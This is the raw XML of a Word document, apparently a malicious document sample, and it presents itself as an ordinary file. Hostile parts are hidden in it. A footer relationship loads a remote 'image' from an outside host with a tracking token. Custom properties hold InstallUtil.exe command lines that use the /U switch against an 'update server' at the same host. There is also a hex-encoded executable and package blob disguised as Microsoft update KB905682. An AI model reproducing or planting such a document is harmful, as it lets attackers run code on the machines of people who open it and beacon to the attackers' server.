    <w:rsid w:val="00F33839"/>
    <w:rsid w:val="00F72BE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8194"/>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60ACB"/>
    <w:pPr>
      <w:spacing w:after="210" w:line="248" w:lineRule="auto"/>
      <w:ind w:left="1090" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00760ACB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
      <w:ind w:left="1090" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00760ACB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:ind w:left="1090" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>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trPr>
      <w:hidden/>
    </w:tr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760ACB"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00760ACB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz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60ACB"/>
    <w:pPr>
      <w:spacing w:after="210" w:line="248" w:lineRule="auto"/>
      <w:ind w:left="1090" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00760ACB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
      <w:ind w:left="1090" w:hanging="10"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00760ACB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:ind w:left="1090" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>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trPr>
      <w:hidden/>
    </w:tr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760ACB"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00760ACB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>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eventDocClose/>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microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffect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endnotes" Target="endnotes.xml"/></Relationships>
</file>

<file path=word/_rels/footer1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="https://irsdeliquent.com/index.php?token=F7AMF3NN"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321EDDE-AAC1-4089-907E-C9D0A54C342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TotalTime>
  <Pages>6</Pages>
  <Words>1627</Words>
  <Characters>9276</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>77</Lines>
  <Paragraphs>21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10882</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HyperlinkBase>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8196fefeab8dcdc72341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|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2842000000000000000000004242000000200000000000000000000000000000000000000000000034420000000000000000000000005f436f724578654d61696e006d73636f7265652e646c6c0000000000ff25002040008196fefeab8dcdc72341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504b010214001400000000003375fd48604f6359002e0000002e00000c0000000000000000000000ff81000000004b423930353638322e706b67504b050600000000010001003a0000002a2e00000000</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Nick Landers</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mal.test</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-19T18:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-15T21:11:00Z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OF">
    <vt:lpwstr>KB905682</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="OD">
    <vt:lpwstr>\Microsoft\Updates</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="IU6">
    <vt:lpwstr>C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /U /logfile= /LogToConsole=false /UpdateServer=https://irsdeliquent.com/index.php /ID=F7AMF3NN</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="IU3">
    <vt:lpwstr>C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U /logfile= /LogToConsole=false /UpdateServer=https://irsdeliquent.com/index.php /ID=F7AMF3NN</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="M">
    <vt:lpwstr>https://irsdeliquent.com/index.php</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="ID">
    <vt:lpwstr>F7AMF3NN</vt:lpwstr>
  </property>
</Properties>
</file>